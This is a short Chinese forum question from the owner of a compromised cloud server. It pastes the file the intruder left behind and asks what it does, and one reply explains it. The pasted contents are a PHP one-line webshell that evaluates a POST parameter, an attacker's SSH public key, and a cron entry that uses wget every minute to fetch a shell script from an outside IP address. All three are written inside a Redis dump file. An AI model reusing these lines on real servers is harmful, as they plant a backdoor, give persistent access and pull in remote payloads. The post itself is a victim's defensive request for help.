「已注销」 2018-02-24 06:50 采纳率: 33.3%
浏览 2130
已结题

windows服务器被webshell下载了入侵我服务器的webshell文件,但看不懂他写的什么?

以下就是webshell这个文件里写的东西 只知道他是写的指向了一个端口 接收了一个post数据
还有一段ssh的密钥
想请各位朋友帮忙指点一下,他这写的到底是什么?是用什么方式入侵的我阿里云服务器?

REDIS0002� �<?php eval($_POST['kkklll']);?> crackitA�

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAlnc9Af+bT1uPuInyFaGKsq3osX9SpG6e7rXHSrWP5Bo43bH60R9a5btWrkCrhQ6TedyHfGId3T+Qd1jHOjmRrEG0AtyJMB/uo2SffdFkEDbgLCNFoizKOPMJMKazSX3in4WqL3tOkL88uyIzDhjvQ8634jQpvWqrqtTGCipsc8DHw/99L0R07nvuU4iT8wCEIwchOsPaMDn9XTqTqCS37pX95DsT8Xf56j+Y6+ODx5UiLAXxXep6hhmIL9xb6gMQHsMl2+O7b42xPZ3HxMhCgGWdSkEZzGF8QOuBHPMFiDib2GRO2E838kKslswexJUVNs5YmgUQKnWSnjgQ/GoMZQ== crack@redis.io

lloketmbnn@F

*/1 * * * * wget -nc -P /tmp/ http://103.243.27.43:15514/postzm.sh
  • 写回答

3条回答 默认 最新

  • bboda120 2018-02-24 07:08
    关注

    整个文件只有这些东西吗? 

     <?php eval($_POST['kkklll']);?>

    这段方便入侵者随时可以链接上来。
    crackitA 还有后面的 wget 下载下来的脚本 是为了拿下你的服务器用的

    评论

报告相同问题?